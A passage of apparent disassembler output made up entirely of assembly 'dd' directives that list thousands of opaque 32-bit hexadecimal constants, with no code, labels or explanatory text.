		dd 0F62D8EF8h, 0BF1E3CF3h, 0C8740498h, 3D737B5Eh, 0BC1842B6h
		dd 3AD91396h, 0FF439940h, 0D59B68Ah, 0E2A4DC55h, 0ABA71087h
		dd 524655A5h, 0A7470A04h, 0C0FE8C4h, 16A4B0FDh,	2AFBCE5Fh
		dd 977DAFB2h, 40AC0E97h, 6A5D0FC6h, 54C00D6Ch, 2E131405h
		dd 162FA69Ah, 0E7C61E69h, 175207C1h, 16DBD5D1h,	0A83C30AFh
		dd 0B808258h, 276FE0A2h, 577A6AFFh, 0D1611E4h, 656C3B00h
		dd 45C6CB4h, 8E8395DBh,	0CC66F5EDh, 0B872B753h,	35C3CBFEh
		dd 0BEA7DCB4h, 1641A68Fh, 7A676E3Bh, 13E5AF3Eh,	1C99D83Bh
		dd 606D43F1h, 9A26AA15h, 0C552DB7Ah, 5B9D38AAh,	0B3E2316Fh
		dd 0A8DA0E3Ah, 0ECD96914h, 2290315Eh, 0DE6D15ADh, 1CF16278h
		dd 0F0FB9FEAh, 0C306F80Dh, 0ED9FAEFCh, 0F3B3BCB4h, 59523D9Ah
		dd 9A5C91BCh, 0D085B8E5h, 72BE2E66h, 0B472F1EBh, 0A0AC2FDCh
		dd 0AC09ABBEh, 0DE11A0D9h, 0BB57DDCEh, 0E2265181h, 14FA4115h
		dd 0B25B8F46h, 0A191E5D1h, 57581DB8h, 2BD7C4E0h, 630C462Bh
		dd 98BD853Ch, 0D5CE649h, 0DC406A75h, 63D6DA91h,	4C711CA4h
		dd 1C26AEE0h, 534050B3h, 1E576A72h, 0FF76750Bh,	809FECA6h
		dd 21CF31ECh, 0F753CB2h, 499F8C2Bh, 0FD897DA8h,	0D9DD7273h
		dd 0D5464F01h, 269599C3h, 0B516029Dh, 4AD102D7h, 2D1CDA06h
		dd 0EB8DB3E7h, 6D832516h, 98FD58DAh, 527DE082h,	395030C3h
		dd 343BEFDDh, 0E49BAB5Ah, 0CF0B6C12h, 0CAD2627Bh, 0F17CD5F1h
		dd 9610E65Eh, 0A9866E0Fh, 40E6C771h, 55DB4F15h,	3F0F377h
		dd 0D07CAC53h, 6719EB4h, 8D709552h, 0B71464Ah, 13D7D9E2h
		dd 6CB69434h, 0EC0F7850h, 5507D81Fh, 4C5DD52Eh,	87FEEB63h
		dd 209060E2h, 4139902h,	9CA97576h, 0C2312E05h, 70B4505Bh
		dd 0A1315F5h, 0E12D3E19h, 5F11BA6Eh, 4AB63C85h,	89A2C4B4h
		dd 0A6526E40h, 0ED9C8BAFh, 12245EDFh, 0E4AC26EEh, 1D0C9989h
		dd 7103446Dh, 0B25B2DABh, 1A4359B3h, 0EE4EEC0Fh, 0E9F1EBDBh
		dd 554104D2h, 0B45B7169h, 0AE3F6424h, 40FB9F47h, 0B6BE7CAh
		dd 0C4F83997h, 0D7537B0Fh, 9488B0AAh, 0BCAE5A38h, 0E427B5DCh
		dd 0C2EE6AB8h, 0E6A8DBD7h, 0B98E1E2Fh, 0DABCF54Bh, 0BA595CBCh
		dd 0C4699822h, 0EC507121h, 0E4722CF1h, 0B77ACE34h, 0AA8A27F3h
		dd 7183CC20h, 1FBF6175h, 0C1A6317Fh, 0D1984703h, 0B4D86824h
		dd 0FE551AFCh, 3A83EAE9h, 512587BBh, 65FE97F5h,	6E25033h
		dd 1515B1Dh, 0C25FDADCh, 0B08ACE32h, 276A24F4h,	7A1ABFFCh
		dd 0F68FB584h, 0FC1773Dh, 717304BBh, 0DE22511h,	0D19A2311h
		dd 5ED7354Eh, 0E91788B1h, 29AD1F12h, 7D255299h,	897083EFh
		dd 3C353681h, 2D269FA3h, 3DBCF4C8h, 6C65E859h, 8666F66h
		dd 0C2642992h, 62DC1B83h, 8A27EC29h, 0EA2CEBB6h, 0C5FA2DFDh
		dd 0FF851655h, 0AB21174Ah, 87DD8A73h, 0A77B02FCh, 59F16FE6h
		dd 4B9D86E2h, 0BAD38753h, 9047A54Dh, 3B46A030h,	0CB43A97Ah
		dd 0CABD2F96h, 0F97576F5h, 9E735AE7h, 5355B8EBh, 0A8B417C3h
		dd 8F3CA75Dh, 0DAE44971h, 0F24CF18Dh, 5522FF43h, 0ABD1F294h
		dd 0D81E32D1h, 412E5F62h, 0F82B4E0Fh, 0B722C4FDh, 11C2AC26h
		dd 67511EC9h, 0AF27A25Eh, 0A563799Bh, 0A9682449h, 9B1901F5h
		dd 9F471408h, 0EFEBA643h, 0F86209AFh, 1ECF1F33h, 0B2E0FE78h
		dd 69BC861Bh, 62503372h, 0CEF149Ah, 43CE2C6Fh, 9307AEBDh
		dd 0C90B6886h, 0D9382BB5h, 0C2069FD6h, 0DE0C4555h, 0EDB8F3E8h
		dd 3ACDFBB8h, 0F86FDBF1h, 0C0FC461h, 0EBC0ADF1h, 0FC799EFDh
		dd 0CCCC410Bh, 618EF84Ah, 0AD189705h, 0A98DE556h, 5A6DE5CFh
		dd 3E91681Fh, 0E2F94AACh, 168B86A8h, 0D966CDAEh, 0A0B4C687h
		dd 0AC3532Eh, 1D6B887Eh, 0C73E6A55h, 95CC89B3h,	654B3FBDh
		dd 5D20CB19h, 502CAE61h, 351F870Ah, 52E00E03h, 6C5907C4h
		dd 0EAE6ADF4h, 0EE5DC77Eh, 0FAA1C969h, 0E1FA758Bh, 0E29C6882h
		dd 0EE32B365h, 92F1EDCEh, 34B1F091h, 6DFB6D06h,	24AA7DD9h
		dd 5B66E835h, 0D09F92ABh, 0F7DA1BFBh, 7EFBAA4h,	0E9FFA9AEh
		dd 0FD5A22B0h, 0C67585F8h, 55FBC98h, 729E40F8h,	2B7F26C1h
		dd 0BE64CE35h, 496DB19Ah, 47917C4Ah, 0A98573B0h, 0C357CA78h
		dd 1E45AABh, 533343Fh, 0C742FD3Eh, 981672F5h, 91F4094Ch
		dd 0DE494ECFh, 9CBEC01Ah, 6E2A9A22h, 15FACCF2h,	3E7BECBBh
		dd 267AEA12h, 0E8C67E54h, 6854EACDh, 91BC7198h,	7089FD45h
		dd 6F893FD6h, 0AF4DA69Ah, 0EFB65551h, 0FECDC6CBh, 612A5F63h
		dd 0E4EDEEDAh, 74299ED2h, 4F6219E7h, 51A953AFh,	65F95CEDh
		dd 0F80E6EC2h, 0EDF691C0h, 0C5911EB5h, 754E854h, 327DA8BBh
		dd 71D22590h, 58E9DEBCh, 0DE628CF5h, 72372D1Ah,	291F83AAh
		dd 9FB890FCh, 72F245E8h, 0DDFBA5D8h, 0C283733Dh, 0EF0F033Ah
		dd 0F8BA4F5Ah, 0B2A16408h, 11C71417h, 0B9853B4h, 8C345C61h
		dd 0E56B65A6h, 9F097246h, 2D12F0DEh, 0BB31DEF7h, 15F253ECh
		dd 0CFB55BB6h, 831C184Ah, 0AE2C5C8Dh, 866975Bh,	585B37F5h
		dd 4CE57E0Dh, 9092681Fh, 5ACBA307h, 1E38BD68h, 850F0C90h
		dd 178A5EDDh, 0B35E64AAh, 647A607Eh, 87E39C19h,	64682BF0h
		dd 5CF46978h, 0CA1E9DCDh, 62E0067Ch, 99E507C7h,	59E7CE1Eh
		dd 724579B1h, 0A06756B8h, 52D932C5h, 4711258Dh,	0BE4E3622h
		dd 32FE0E66h, 5A548E0Ah, 9AC32B83h, 8EA0AD15h, 0A5E724EDh
		dd 0CF6359A4h, 50680AA4h, 49BC02C3h, 641D63D5h,	0EAF5E8BEh
		dd 5551B7Fh, 0EDF93CD5h, 27132584h, 27FE7198h, 1FC2337Dh
		dd 2FD43416h, 0B6D77631h, 3E76754Ch, 0BBD2E1F8h, 0A4E6855Ch
		dd 9A33A368h, 0AEB04EF6h, 9F294FACh, 0C4CEB8Dh,	0E69A7554h
		dd 41131608h, 0D6F09ABFh, 0A9DDDF05h, 0ECD2EFC5h, 0A0F91D0Ch
		dd 73059D15h, 380D1B47h, 9E07228Dh, 91F5DECEh, 49C5B375h
		dd 0B9955974h, 0AB760ED1h, 8E95EAA0h, 0D9D849EEh, 0BAE4E04Fh
		dd 7E1A3CDFh, 49AAA425h, 0A5AF2558h, 693CD68Ch,	0AEF29991h
		dd 93C1FB4Eh, 0D5B3B59Fh, 948F2566h, 8FC6DA86h,	0F03CBE55h
		dd 33B58B41h, 78F6AA27h, 93168465h, 17257D2Ch, 77945773h
		dd 2CC9752Ch, 0DBD2202Ah, 95A8EB6h, 3E0F195Ah, 3359BA74h
		dd 585E0E33h, 60BA0163h, 4A45D5FEh, 0FE1F98D4h,	0D9A25495h
		dd 117546D4h, 0FD6231A2h, 0F03F02ABh, 4FE8CBF0h, 4B26ABB5h
		dd 7C2EA51Dh, 7032B0FCh, 2CE49425h, 33DA6B03h, 9BCD9C5Ah
		dd 445D9664h, 45554ADCh, 0B14AF112h, 0BE04ACC4h, 2BE951A0h
		dd 0F6CF325Dh, 2C4F816Dh, 617B15F0h, 44B49586h,	879D5D19h
		dd 0CDA16A0Bh, 7A2DECD4h, 387D20CFh, 0E43FEB86h, 0A738D80Dh
		dd 0E6CA0D39h, 9EBF93E7h, 0E3287B11h, 1AE92ADFh, 0B95F21B5h
		dd 0CFB37AB1h, 0B40FB040h, 414F38B8h, 3AA68EF1h, 76837B6Fh
		dd 3EABC591h, 0C6BA52F0h, 0B9F23C13h, 78070047h, 7A15BFB4h
		dd 0D13C1DC9h, 15B7A09Ah, 76AE85D5h, 78C56AB5h,	5E66717h
		dd 5E54A916h, 63921EC7h, 89771807h, 0CA2391C7h,	88DEFACAh
		dd 0F7EE667Ah, 45CF5D6Bh, 3242D08Bh, 1734C2DAh,	8D5949B8h
		dd 0DCD6331Ah, 22D1BBF0h, 0B1A85180h, 5AABF4B2h, 858ADA7Ah
		dd 7FDD248Dh, 4E6CFF4Fh, 20E07812h, 2167B835h, 0DF7172F0h
		dd 1B460190h, 24CF54FCh, 9B1FB54h, 547A80D3h, 9A1FDA46h
		dd 3207E9BCh, 0B8B48235h, 9C511FDBh, 0F5129FEDh, 1573A183h
		dd 5510F06Fh, 641FC2ACh
		dd 3371E0E9h, 68EEE718h, 0C2AFD692h, 0E269572Fh, 0EEC5AADDh
		dd 0B81FF825h, 0C52F2B33h, 0AFD907EFh, 8DF005A3h, 0FC0FF509h
		dd 2CBAB130h, 9FC83AD5h, 0D320674Bh, 0DD9579E3h, 916D55DFh
		dd 92755E72h, 0D632F18Bh, 0F29A15F4h, 7E7E165Ah, 5B5E6FD1h
		dd 5C3C1B78h, 6D5AC9CDh, 1A6EA337h, 17DE3238h, 5D1FA486h
		dd 0DCB4E0F1h, 4DAF6B87h, 0CC2C7CB1h, 0CA50261Bh, 9D0B1D83h
		dd 561F2626h, 75FF69D2h, 1DA1EDF5h, 7F580D0Dh, 0BF70C87h
		dd 0AEBDB226h, 350F249Ah, 2424A2F1h, 364BFCE6h,	0EF4AB7F9h
		dd 10BD882Eh, 0AC5FB876h, 89DAC533h, 3ED1CD56h,	26E05881h
		dd 797AAF95h, 31E511B0h, 0E7C6BD5Eh, 91DD6C62h,	4595F98h
		dd 0D320B08Eh, 0F08744C5h, 402B226Bh, 0B8B752A7h, 9289F52h
		dd 0A663327Eh, 9C17EE04h, 0E037F18Ah, 7F89E4F8h, 0A9EFAE29h
		dd 6C8ECEF7h, 4FF9FAE0h, 469E708Eh, 0B135DFBh, 2546B2C4h
		dd 0B4E898Dh, 7F361D0Dh, 0CBD73782h, 5DBEEFC0h,	4C2B8E4h
		dd 5FC6B19Ch, 0F64D58BEh, 6250EA6Dh, 24A7D63Ch,	0AA44E83Bh
		dd 62D97370h, 5AC32D62h, 9E082516h, 3B11B818h, 0C1C52D93h
		dd 0E5112FF0h, 0E923A039h, 2FCD6B05h, 0B8318AAAh, 0E20C31FBh
		dd 3814327Ah, 0EE2EB81Fh, 0C49C8A41h, 0B0B676F9h, 4262D9DDh
		dd 0FEE2FD57h, 75ED31B0h, 0F68BC911h, 0E7135F2Ah, 0B78BFE7Bh
		dd 40AC5271h, 65AC9191h, 16AD421Fh, 53E8DC75h, 0A8771EA5h
		dd 1EA988A2h, 1C2B0C45h, 15270215h, 4933B6A5h, 80A181F9h
		dd 213305A9h, 65DEFD8Ch, 2A3BEC8Dh, 2E7B1363h, 97D49F8Eh
		dd 0F1380E5Fh, 9318310Fh, 297D0FD5h, 0F250399Ch, 0FA9A0B63h
		dd 0B668915h, 106372D3h, 0ACAC4DBAh, 768598BEh,	77100BFFh
		dd 7A3CB7D3h, 0C90789E5h, 0E02F1650h, 0F5259E1Ah, 0A4F16B6Ch
		dd 0B9D46A51h, 0B3F91F3Ch, 0E65E3313h, 86D1C0F6h, 79DD5C1Eh
		dd 0DBD41BB7h, 0B11F9EEBh, 65075DE2h, 0A7E65235h, 6C3F7360h
		dd 0F23EDDBAh, 1C631174h, 46229BC1h, 5AFFE4C3h,	0E18DD22Ch
		dd 746D40E9h, 7F75A39h,	0EF748DAAh, 34BFC0F7h, 2CA92E94h
		dd 0C123FB77h, 97E3BEDEh, 0E33097D4h, 98CEC07Fh, 0BA27E1C4h
		dd 9CD7273Bh, 0F3BA2193h, 0EF5BEA0Fh, 0A65FFA3Dh, 0C7B7EFC3h
		dd 0CBC172B8h, 57E53A2Ch, 0A55AD38Ah, 0D66C4B65h, 0CBFBD1CFh
		dd 0BCBDDF9Bh, 8D7B9579h, 0B473FC76h, 5A64A578h, 0DED6B457h
		dd 0C9796DCAh, 0C37BD44Ah, 48A50AC6h, 0A64DDD69h, 78D86B80h
		dd 8D138762h, 617E585Eh, 3B4416A5h, 2D8DE59Ch, 0A5A66543h
		dd 28BBD6EBh, 0C6E1AF69h, 72BD8E8Ch, 7BFF50B4h,	0D7EDD6ECh
		dd 0D4C4202Ch, 0C84E1F65h, 556F7EDBh, 5C79152Dh, 0C65C0A01h
		dd 67DDFB44h, 0AF32C7CEh, 0C51EA044h, 1C71F61Eh, 2B3FFAFDh
		dd 0B815537Bh, 9BC18DBAh, 0FD4234BFh, 203DF418h, 70276176h
		dd 0DE8AC3F5h, 677824B6h, 9B1DA5EBh, 0B763EC48h, 0AFC7E334h
		dd 0F3E3A3EEh, 0A6345554h, 6D079E8Eh, 30568B8Ah, 65DCB23Bh
		dd 88E9C33Bh, 49372505h, 53612E0Ah, 53EA0990h, 45965FBDh
		dd 0D2BEF9CBh, 87A35D29h, 17E34AA5h, 545BC4DCh,	50BBD42Dh
		dd 53350674h, 26D137D3h, 1A251C7Ah, 8405ECBEh, 68426D2Bh
		dd 0A30479A4h, 0C84A5054h, 0A0695810h, 8CAF5284h, 41E04412h
		dd 8C42395Ah, 0E23C1Ah,	10108E4Fh, 0A309EE04h, 0EA5AC7D3h
		dd 0A2E9D294h, 0E89A51F4h, 3A1AD334h, 4E837595h, 13AE9D01h
		dd 44E82741h, 553A89D3h, 124EA274h, 43131E9Dh, 0D0B488A7h
		dd 7441B2E9h, 9D73E852h, 0A7403A12h, 694B4E82h,	88E893A0h
		dd 0D3E888E7h, 0F6AF2031h, 10309C5h, 2AED9DB0h,	4F8836A4h
		dd 5FFE4CD9h, 3F0B15Ch,	0E4FB7929h, 2448EF4Eh, 15B11EA3h
		dd 932C5A43h, 624949B9h, 0E9C85C8Fh, 8E669326h,	0C8B6A916h
		dd 0AEC3465Dh, 7F524D88h, 69D29EC0h, 0C6C993D2h, 21AAD45h
		dd 628D63ECh, 7326FC55h, 9DAE1593h, 44AC8A92h, 0B1C9CDBDh
		dd 0EED5AE97h, 0E30D9567h, 9ACEE7DBh, 6E3E7E26h, 4971FAF1h
		dd 0A7F7C592h, 0B44F0D91h, 204ED1DDh, 0F347A347h, 97E013C6h
		dd 5E4CE2A0h, 6C7B4E6Ch, 70FCC818h, 0D4A627ADh,	1B2A2E5Dh
		dd 69746252h, 0FF59FF4Bh, 2ACCE881h, 44B2F51Fh,	1FEEF8A1h
		dd 0A8B9581Fh, 6EB531B6h, 17BBA016h, 7A4828B7h,	0B882A3D4h
		dd 4619D0E0h, 44CD3688h, 0F8A7715h, 0B85706E4h,	33003898h
		dd 99A40794h, 962D885Ah, 72262AFEh, 862A09C6h, 0C6E21C05h
		dd 0E263DEBEh, 95C11CC8h, 0AA6ECBCDh, 0DFCFE443h, 0E531EC32h
		dd 35CADA88h, 8499EEE3h, 0E7E6F38Bh, 93B0321h, 4CC9F6E5h
		dd 2D129ABFh, 15B36796h, 77461749h, 7FCD40B8h, 0A996A9B8h
		dd 0A4A758B9h, 0F0FC42A4h, 9362527Ch, 8B5F0660h, 0B7128743h
		dd 3BA39151h, 54ED5CE3h, 166A9792h, 6F4D12BBh, 3C0F16B1h
		dd 0CC8960FCh, 40BC8A1Fh, 0C071D043h, 73BD8281h, 3EA766Fh
		dd 0D0FC6E53h, 98AAECA0h, 5F02143Bh, 98B361D4h,	0C16C5395h
		dd 345E997Bh, 0B2DCABE9h, 0E7A9195Bh, 0AB49D84Ah, 29F58BF6h
		dd 0F3ED00B2h, 1AF24303h, 44F62FAh, 5531FC3Ch, 706CF90Bh
		dd 0EF3ACCEEh, 0F174BF87h, 0C7FAC242h, 0EFA45FA3h, 1940532Fh
		dd 5077ED2Ah, 27593731h, 97B76BE2h, 2FE8C88Fh, 0AD3ACD8Bh
		dd 7C8291C9h, 4C252E73h, 5E69A6BDh, 27F00FC2h, 8F056D1Fh
		dd 0C5D5294Dh, 5035EE7Ch, 4BD555EAh, 0FAD5604Bh, 64C21F4Eh
		dd 0F1013B6Fh, 0CB18F964h, 0CD5F7FE0h, 96BF044Ch, 9E55CFFAh
		dd 0B1A1A1B6h, 6F7E0ECAh, 6E17C0F1h, 89271A6Eh,	2662D963h
		dd 1B6DCA9Ch, 6DAE5667h, 0BD75537Dh, 0F148F639h, 150BD224h
		dd 0ED27282Ch, 0F66F47D7h, 0A4C5BB3Ah, 475A6656h, 0EE14023Bh
		dd 2AC56304h, 8B9BA041h, 1D6955AFh, 6C8D7972h, 98BCF795h
		dd 822D08A1h, 6EAEB1C6h, 0AC3DB6D6h, 8CBD1CABh,	0CB2E758Dh
		dd 0A5F1505Eh, 0DEE32B1Eh, 0EC78629Ch, 390BAB3Eh, 40A866DAh
		dd 1EBA99CBh, 0AACA50FCh, 0AD6DF2E7h, 75CCBA6Fh, 9A76981Ch
		dd 19CDC9B2h, 210FC73Ch, 9C75F78Ch, 25EADEF2h, 0D16AD427h
		dd 14CA428Bh, 0AF60D68Dh, 295D29CEh, 0F36C4A1Fh, 0CEC19A14h
		dd 0B331A612h, 0E4EC7FB5h, 0E72AEE7Ch, 97E57498h, 3CD661B7h
		dd 216B59F2h, 0D15E1A25h, 1396D5AEh, 0C3221C3Fh, 280CE8ABh
		dd 98906615h, 9966DAE9h, 8FA46D9Ch, 84A2A14h, 65B74EC9h
		dd 94FF5677h, 0DC3CE0F1h, 7E3CCD88h, 52B486D8h,	4D750F8Bh
		dd 0CBC34530h, 0B3E724F3h, 8A41393Dh, 99A23F0Bh, 63226FC9h
		dd 6A64B466h, 0FF1170FAh, 93018234h, 0F6FBB9A9h, 2BF1ED4Bh
		dd 7E5DC552h, 0FC7237Fh, 0ABF6074Bh, 7D5AF63Ah,	8861C41Bh
		dd 136FC03Dh, 12C19E90h, 0F99C57B4h, 88B7CB5Fh,	3EF53492h
		dd 60F8BCBFh, 0C0ACBBA6h, 0EF0E275Eh, 0DB743956h, 3E9FCDAh
		dd 0BC960DDEh, 5301E395h, 97E307DCh, 72CFEFB2h,	5FD449BEh
		dd 8A1DEBAEh, 2A4D4AAAh, 6E7FE62Eh, 0F97D5694h,	0CAAD6BA3h
		dd 38B7FE2Bh, 7E077759h, 71CADE78h, 74AC2DB2h, 4F65BE8Bh
		dd 0FC8FF585h, 57621BDh, 0CCFD2AC9h, 0F8A195BFh, 4FB1ADC0h
		dd 1C25B69Ah, 0F07DDF16h, 0D46B0ABAh, 8C3CCBE6h, 615BB4F6h
		dd 5E3A3FB4h, 0D282B0CFh, 3ACBA945h, 813BCDE6h,	749909D1h
		dd 1725D6FAh, 30481F9Ah, 0E1FC1976h, 5FAF6D8Ah,	4249030Ch
		dd 18872D7Eh, 9A55C9DCh, 4D4CE231h, 1A86D0D3h, 54BF4DBCh
		dd 18C2B64Eh, 1C6F07D1h, 0AF60371Fh, 936A9BDCh,	677A0CEAh
		dd 77668C69h, 0A8331AA8h
		dd 66079FDAh, 91DC526Dh, 0A047CF5Fh, 0F212E383h, 6626D68Ch
		dd 0A953996Fh, 0C96230C5h, 0DB9965C8h, 0F8E8F9DBh, 607AD7Ah
		dd 0FDF191BFh, 57987E1h, 1A4C722Bh, 49156B54h, 0F07E09B5h
		dd 0AECDAE26h, 3A55183Ah, 1D40A25Ah, 0F85ADC3Fh, 0F05B72EFh
		dd 0E2349896h, 731F56ACh, 817FC24Eh, 0DDF55EDBh, 47F9FA50h
		dd 7C6D1D5Fh, 62D83D6Ah, 71515AB9h, 0A855A61Fh,	0ECB50DC3h
		dd 0D83AB770h, 6AE3B415h, 0D0DC1CD7h, 19A7EDC4h, 0BFC0F0Ah
		dd 26779CF3h, 0A33B9A4Ah, 7F557A8Dh, 0F445ED3h,	8E52879Ah
		dd 3E153986h, 0E6DFDB42h, 0BD9E0246h, 52947E37h, 1AAB3BB1h
		dd 70846794h, 463804CDh, 0F8653911h, 0EE6F0E97h, 0ACE00332h
		dd 786F8979h, 0C6327C3Ch, 61169B00h, 0F4DC7B1Dh, 0E880CEB1h
		dd 0F7403FF3h, 0AB4DB3E3h, 0ECFDEC8Dh, 0D657E2D1h, 0DBAE5565h
		dd 0D91792E3h, 0DFED81FCh, 0B5242299h, 7885BD59h, 0A3C65D05h
		dd 90BE284Eh, 81C8717Fh, 0F6670E07h, 9E5DB998h,	25815F25h
		dd 0A22A17A6h, 111C2B25h, 0D3ABD04h, 66EB8B1Fh,	7DECD22h
		dd 0B4484A12h, 0D86BD5FCh, 6A3CA24Fh, 35C563F8h, 6F4A2CAFh
		dd 0E236C827h, 0F23D3A96h, 5AF6FB88h, 0D019C9A3h, 45671AECh
		dd 7CBF0481h, 0E3E54877h, 53625F4Eh, 3D62C6ADh,	0A5628AEDh
		dd 8137F8A8h, 8F7FD1FBh, 0EFD61890h, 0A490F16h,	0D75F9CC7h
		dd 4B3265A8h, 0CAF1708Bh, 0FBCFCDD5h, 9FD26576h, 0CD12A80Ch
		dd 756F54D6h, 968DAB52h, 6EAE2143h, 3E6B86AAh, 0B2DE4F05h
		dd 3B7553FBh, 24FD5FF7h, 0EE4DD3FCh, 1551DAD3h,	0A4337543h
		dd 0E5819B82h, 9930A371h, 719FE411h, 6E63B48Eh,	89DE501Eh
		dd 0D892CBC9h, 0F8520F7h, 6A337C36h, 87D1145Fh,	0DA8C3B18h
		dd 0A4443897h, 0E07396Fh, 0A8F193F8h, 1523D141h, 0CC5367Dh
		dd 0E811EA15h, 9B5BAB5Ah, 4A34A6D5h, 0E79F970Bh, 8DF9AB07h
		dd 31A2BEDEh, 6BACC529h, 0EBDFB270h, 0BC351E2Eh, 0AFC0E25Ch
		dd 6DE23A8Ah, 805701F6h, 679CFF59h, 576D079Ah, 962B9B46h
		dd 0C468B2Ch, 0C6BD3DD9h, 0EE09D18Fh, 24AEECABh, 553D914Bh
		dd 6E1D4FC4h, 0EE1F06D8h, 273E59F3h, 0B9A2948Ah, 2528DAC7h
		dd 517BE172h, 15CE78A4h, 4786D2D9h, 0E4A9EC86h,	0CEE64707h
		dd 0A403AE56h, 0A231026Eh, 0B3E6943Ch, 1DC61F03h, 99F09FACh
		dd 9D8B3BD9h, 12D043C3h, 7BEADB9h, 61A32A76h, 965F6B93h
		dd 995CDA2Fh, 19A96BA6h, 0F1A7388Eh, 3589F8C0h,	0AF0DD5A8h
		dd 2E7A7C55h, 0E7DE7BF7h, 607CED9Dh, 3824ADB1h,	9EF3AD19h
		dd 0E5CBB8BFh, 62FBBFD2h, 5FCDFD89h, 4FEFF948h,	0CF6159DFh
		dd 4A54EEE8h, 0FC59AC7h, 9338D59Ah, 0BF0AA44Ch,	9A769D5Fh
		dd 0FCC70D4Ch, 87D392DEh, 0ACAA9365h, 0DCA5E059h, 1241CF9h
		dd 0DCA19183h, 983DCBBEh, 6ABA6A5Bh, 99D65B08h,	28D18875h
		dd 3F075F64h, 0A7696A34h, 0FEF1A58h, 0D4AB19ACh, 6CD0CFEFh
		dd 33FB5991h, 1BFD464Bh, 84312FEBh, 35103981h, 5267F374h
		dd 9618D455h, 4B37EFF7h, 2BCDB25Fh, 0E833A389h,	2FBDEBF3h
		dd 0EB5B0675h, 655FD1DCh, 0E151F7F2h, 19571922h, 0B82FA135h
		dd 5351EBCAh, 8BFD9BFEh, 2F04090Ah, 4436F836h, 48CD859Eh
		dd 0EAABC745h, 79EBE2F2h, 0E9E39CDh, 31B8BBF7h,	2F85D54Fh
		dd 0CD5D32DBh, 0D0FD627Ch, 6E352C6Ah, 0D41B6A9Bh, 0A2041BD5h
		dd 256E8FE5h, 0E3587355h, 0DE0422EDh, 96199A2Ah, 0E7704FF4h
		dd 0F4E11BEAh, 0BE74F177h, 0B46B6A4Bh, 0C774CD57h, 0DD537C7Fh
		dd 64B0A7C9h, 0D5907105h, 4E78F5D8h, 47DD24EAh,	0B3F16E30h
		dd 0F47B59A3h, 57691A68h, 0DA21A1BFh, 0C73550A9h, 2270FA7Fh
		dd 90A5F9A5h, 0AF817CC2h, 0A1EF92BFh, 0C202A67Eh, 63A06B06h
		dd 0ECEA69F9h, 1FE67410h, 9DCFED87h, 3A49A15Ch,	7EEC62BFh
		dd 6AF9E2ECh, 864564E5h, 0B5FA47B6h, 4BE1D59Eh,	0CAD1D313h
		dd 8DE53E3Eh, 0E8DBF42Dh, 0B469D294h, 9C53F79Ch, 79BFFB1h
		dd 0FC225B7h, 95660777h, 0D389CE6Dh, 70FC90FEh,	9A334CFBh
		dd 0CE71667Ah, 9DCFF67Eh, 0D90992E2h, 6278D13Ah, 4682509Eh
		dd 0AA28551Bh, 263F6B8Ah, 7E095786h, 3787E39h, 13D71DFFh
		dd 20615FD3h, 0EC62E9B5h, 0F53E6BDBh, 7C0F4A09h, 0EBE11F8Ah
		dd 7A76C114h, 99BFE3C0h, 0E528B6C5h, 7A2D5F6Ah,	705D1587h
		dd 3584BA0Dh, 6E834A2Ah, 338191CCh, 0B07CE7FEh,	0DF81E6C0h
		dd 3FC08A37h, 2DAEC98Bh, 0F745E84Bh, 415555D3h,	0FB110F8Bh
		dd 862E1FDh, 0B879BE00h, 0DB8328BFh, 0BA0524Bh,	69657F62h
		dd 5BB00297h, 8BA85AD1h, 7BAF657Fh, 0FAD65000h,	0E314BAFDh
		dd 7E3189FDh, 0DD2DE4D9h, 5BEA2EF9h, 45CF349Fh,	6ECD6A82h
		dd 3B6CA1AFh, 0A842B8D9h, 5705CE7Eh, 56945583h,	0E55D6523h
		dd 0B47A63DFh, 932F2C3Ch, 75A702D2h, 36BBBB3Fh,	399B0C14h
		dd 6FB0EFB6h, 0EF112BFh, 42F6C191h, 74CF6749h, 0FB89F03Eh
		dd 0D18E8585h, 7BEDF59Eh, 92FFA960h, 42AB7410h,	7D300CDCh
		dd 0A4B0A267h, 0D9E6F438h, 0D67C2762h, 0F549602h, 1722C595h
		dd 32FE7AC3h, 396E941Ah, 61CC8253h, 0B347DE50h,	6E54DEAFh
		dd 7A6599Fh, 0DBEFE71Dh, 0ED769739h, 58844F71h,	0AF0CD115h
		dd 4F92B2ACh, 3950B0CAh, 70B5AE74h, 86F8F0A2h, 7DF908A7h
		dd 0D517C6D5h, 0FF339492h, 393C0556h, 5B7D1295h, 1FF28F97h
		dd 381EED49h, 561E29A7h, 0F34571CBh, 3A12E3C1h,	35A261F8h
		dd 8D40A99Ah, 5A47504Fh, 0F7D981B2h, 0BF696F1Ah, 0D03A7436h
		dd 555BBE8Dh, 141E2670h, 78EC14BDh, 569D71CAh, 15E2EACBh
		dd 0BF19ED11h, 162E4BBFh, 5AE903DDh, 7538B4ABh,	3E8555A5h
		dd 3E3DC5ABh, 39A3CEA1h, 0B485F867h, 0FE757BD5h, 0EA64F2CBh
		dd 3073B0A3h, 0D5E6B4F6h, 38FCCF20h, 0BFE9926h,	0EF34BCBFh
		dd 79D17FFh, 0B2960D7Dh, 2517185Ah, 664DF7CDh, 2571D3FFh
		dd 779E4D06h, 2B587A9h,	0E59C1ABEh, 158C1EC9h, 15668124h
		dd 6FED92DDh, 268BE5B7h, 9D1089D2h, 8C278C06h, 953AE46Bh
		dd 977DECE7h, 6BF0BDA3h, 9AA2D241h, 0F57AB74Fh,	0B0C3E178h
		dd 9EAF1E76h, 0F03C162h, 0E0AB70C4h, 0A79AFBD2h, 0B715EC62h
		dd 1459768h, 97D5DDD7h,	0A20F89E3h, 55DDB9D2h, 17B41FD5h
		dd 5DCF177Ah, 8B738B75h, 992EAD2Dh, 0A7C10DA0h,	0B055A4DFh
		dd 78F6E57Dh, 0A824781Fh, 5F593338h, 6C81B66Fh,	0F82D5F94h
		dd 7AB27DA1h, 71DF521h,	3DEE6C0Fh, 0B8F3FD8Eh, 0E385997h
		dd 0B2CA9BFh, 39469408h, 0B6E18A22h, 907A5FBAh,	258B6869h
		dd 0AF2BBB41h, 1F5989EDh, 0BFB23A49h, 0B76ED8Fh, 0C87235F6h
		dd 27F736F0h, 91FFAE4Ch, 5B03EB33h, 4A059515h, 0A130B514h
		dd 893A711Bh, 85556248h, 0A52B740Dh, 52ABBEA3h,	0F3E15CF7h
		dd 5504AD55h, 5F099710h, 6972B29Bh, 52B8B97Ch, 859DD16Bh
		dd 54925F0Bh, 6AAB99C5h, 2EF096D7h, 6369D226h, 0F3FFE181h
		dd 7168A6BBh, 742B6BD6h, 6C55FEA8h, 32F1F7C4h, 9C17100Bh
		dd 7547146Ah, 45410AB2h, 3CB02D81h, 3C58B825h, 230FE778h
